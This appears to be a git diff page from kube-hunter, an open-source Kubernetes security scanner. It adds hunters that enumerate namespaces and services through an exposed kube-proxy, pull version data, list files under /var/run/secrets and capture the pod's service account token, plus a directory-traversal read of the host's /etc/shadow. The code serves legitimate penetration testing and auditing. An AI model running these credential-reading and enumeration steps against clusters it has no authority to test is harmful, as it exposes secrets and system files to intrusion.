logger.debug("Correlated container to mount_name")
|
||||
cont = {
|
||||
"name": container["name"],
|
||||
"pod": pod["metadata"]["name"],
|
||||
"namespace": pod["metadata"]["namespace"],
|
||||
}
|
||||
try:
|
||||
output = self.traverse_read("/etc/shadow", container=cont, mount_path=mount_path, host_path=volume["hostPath"]["path"])
|
||||
output = self.traverse_read(
|
||||
"/etc/shadow",
|
||||
container=cont,
|
||||
mount_path=mount_path,
|
||||
host_path=volume["hostPath"]["path"],
|
||||
)
|
||||
self.publish_event(DirectoryTraversalWithKubelet(output=output))
|
||||
except Exception as x:
|
||||
logging.debug("could not exploit /var/log: {}".format(x))
|
||||
except Exception:
|
||||
logger.debug("Could not exploit /var/log", exc_info=True)
|
||||
128
kube_hunter/modules/hunting/proxy.py
Normal file
128
kube_hunter/modules/hunting/proxy.py
Normal file
@@ -0,0 +1,128 @@
|
||||
import logging
|
||||
import requests
|
||||
|
||||
from enum import Enum
|
||||
|
||||
from kube_hunter.conf import get_config
|
||||
from kube_hunter.core.events.event_handler import handler
|
||||
from kube_hunter.core.events.types import Event, Vulnerability, K8sVersionDisclosure
|
||||
from kube_hunter.core.types import (
|
||||
ActiveHunter,
|
||||
Hunter,
|
||||
KubernetesCluster,
|
||||
ConnectFromProxyServerTechnique,
|
||||
)
|
||||
from kube_hunter.modules.discovery.dashboard import KubeDashboardEvent
|
||||
from kube_hunter.modules.discovery.proxy import KubeProxyEvent
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
|
||||
class KubeProxyExposed(Vulnerability, Event):
|
||||
"""All operations on the cluster are exposed"""
|
||||
|
||||
def __init__(self):
|
||||
Vulnerability.__init__(
|
||||
self,
|
||||
KubernetesCluster,
|
||||
"Proxy Exposed",
|
||||
category=ConnectFromProxyServerTechnique,
|
||||
vid="KHV049",
|
||||
)
|
||||
|
||||
|
||||
class Service(Enum):
|
||||
DASHBOARD = "kubernetes-dashboard"
|
||||
|
||||
|
||||
@handler.subscribe(KubeProxyEvent)
|
||||
class KubeProxy(Hunter):
|
||||
"""Proxy Hunting
|
||||
Hunts for a dashboard behind the proxy
|
||||
"""
|
||||
|
||||
def __init__(self, event):
|
||||
self.event = event
|
||||
self.api_url = f"http://{self.event.host}:{self.event.port}/api/v1"
|
||||
|
||||
def execute(self):
|
||||
self.publish_event(KubeProxyExposed())
|
||||
for namespace, services in self.services.items():
|
||||
for service in services:
|
||||
if service == Service.DASHBOARD.value:
|
||||
logger.debug(f"Found a dashboard service '{service}'")
|
||||
# TODO: check if /proxy is a convention on other services
|
||||
curr_path = f"api/v1/namespaces/{namespace}/services/{service}/proxy"
|
||||
self.publish_event(KubeDashboardEvent(path=curr_path, secure=False))
|
||||
|
||||
@property
|
||||
def namespaces(self):
|
||||
config = get_config()
|
||||
resource_json = requests.get(f"{self.api_url}/namespaces", timeout=config.network_timeout).json()
|
||||
return self.extract_names(resource_json)
|
||||
|
||||
@property
|
||||
def services(self):
|
||||
config = get_config()
|
||||
# map between namespaces and service names
|
||||
services = dict()
|
||||
for namespace in self.namespaces:
|
||||
resource_path = f"{self.api_url}/namespaces/{namespace}/services"
|
||||
resource_json = requests.get(resource_path, timeout=config.network_timeout).json()
|
||||
services[namespace] = self.extract_names(resource_json)
|
||||
logger.debug(f"Enumerated services [{' '.join(services)}]")
|
||||
return services
|
||||
|
||||
@staticmethod
|
||||
def extract_names(resource_json):
|
||||
names = list()
|
||||
for item in resource_json["items"]:
|
||||
names.append(item["metadata"]["name"])
|
||||
return names
|
||||
|
||||
|
||||
@handler.subscribe(KubeProxyExposed)
|
||||
class ProveProxyExposed(ActiveHunter):
|
||||
"""Build Date Hunter
|
||||
Hunts when proxy is exposed, extracts the build date of kubernetes
|
||||
"""
|
||||
|
||||
def __init__(self, event):
|
||||
self.event = event
|
||||
|
||||
def execute(self):
|
||||
config = get_config()
|
||||
version_metadata = requests.get(
|
||||
f"http://{self.event.host}:{self.event.port}/version",
|
||||
verify=False,
|
||||
timeout=config.network_timeout,
|
||||
).json()
|
||||
if "buildDate" in version_metadata:
|
||||
self.event.evidence = "build date: {}".format(version_metadata["buildDate"])
|
||||
|
||||
|
||||
@handler.subscribe(KubeProxyExposed)
|
||||
class K8sVersionDisclosureProve(ActiveHunter):
|
||||
"""K8s Version Hunter
|
||||
Hunts Proxy when exposed, extracts the version
|
||||
"""
|
||||
|
||||
def __init__(self, event):
|
||||
self.event = event
|
||||
|
||||
def execute(self):
|
||||
config = get_config()
|
||||
version_metadata = requests.get(
|
||||
f"http://{self.event.host}:{self.event.port}/version",
|
||||
verify=False,
|
||||
timeout=config.network_timeout,
|
||||
).json()
|
||||
if "gitVersion" in version_metadata:
|
||||
self.publish_event(
|
||||
K8sVersionDisclosure(
|
||||
version=version_metadata["gitVersion"],
|
||||
from_endpoint="/version",
|
||||
extra_info="on kube-proxy",
|
||||
category=ConnectFromProxyServerTechnique,
|
||||
)
|
||||
)
|
||||
62
kube_hunter/modules/hunting/secrets.py
Normal file
62
kube_hunter/modules/hunting/secrets.py
Normal file
@@ -0,0 +1,62 @@
|
||||
import logging
|
||||
import os
|
||||
|
||||
from kube_hunter.core.events.event_handler import handler
|
||||
from kube_hunter.core.events.types import Vulnerability, Event
|
||||
from kube_hunter.core.types import Hunter, KubernetesCluster, AccessContainerServiceAccountTechnique
|
||||
from kube_hunter.modules.discovery.hosts import RunningAsPodEvent
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
|
||||
class ServiceAccountTokenAccess(Vulnerability, Event):
|
||||
"""Accessing the pod service account token gives an attacker the option to use the server API"""
|
||||
|
||||
def __init__(self, evidence):
|
||||
Vulnerability.__init__(
|
||||
self,
|
||||
KubernetesCluster,
|
||||
name="Read access to pod's service account token",
|
||||
category=AccessContainerServiceAccountTechnique,
|
||||
vid="KHV050",
|
||||
)
|
||||
self.evidence = evidence
|
||||
|
||||
|
||||
class SecretsAccess(Vulnerability, Event):
|
||||
"""Accessing the pod's secrets within a compromised pod might disclose valuable data to a potential attacker"""
|
||||
|
||||
def __init__(self, evidence):
|
||||
Vulnerability.__init__(
|
||||
self,
|
||||
component=KubernetesCluster,
|
||||
name="Access to pod's secrets",
|
||||
category=AccessContainerServiceAccountTechnique,
|
||||
)
|
||||
self.evidence = evidence
|
||||
|
||||
|
||||
# Passive Hunter
|
||||
@handler.subscribe(RunningAsPodEvent)
|
||||
class AccessSecrets(Hunter):
|
||||
"""Access Secrets
|
||||
Accessing the secrets accessible to the pod"""
|
||||
|
||||
def __init__(self, event):
|
||||
self.event = event
|
||||
self.secrets_evidence = ""
|
||||
|
||||
def get_services(self):
|
||||
logger.debug("Trying to access pod's secrets directory")
|
||||
# get all files and subdirectories files:
|
||||
self.secrets_evidence = []
|
||||
for dirname, _, files in os.walk("/var/run/secrets/"):
|
||||
for f in files:
|
||||
self.secrets_evidence.append(os.path.join(dirname, f))
|
||||
return len(self.secrets_evidence) > 0
|
||||
|
||||
def execute(self):
|
||||
if self.event.auth_token is not None:
|
||||
self.publish_event(ServiceAccountTokenAccess(self.event.auth_token))
|
||||
if self.get_services():
|
||||
self.publish_event(SecretsAccess(self.secrets_evidence))
|
||||
Some files were not shown because too many files have changed in this diff Show More
Reference in New Issue
Block a user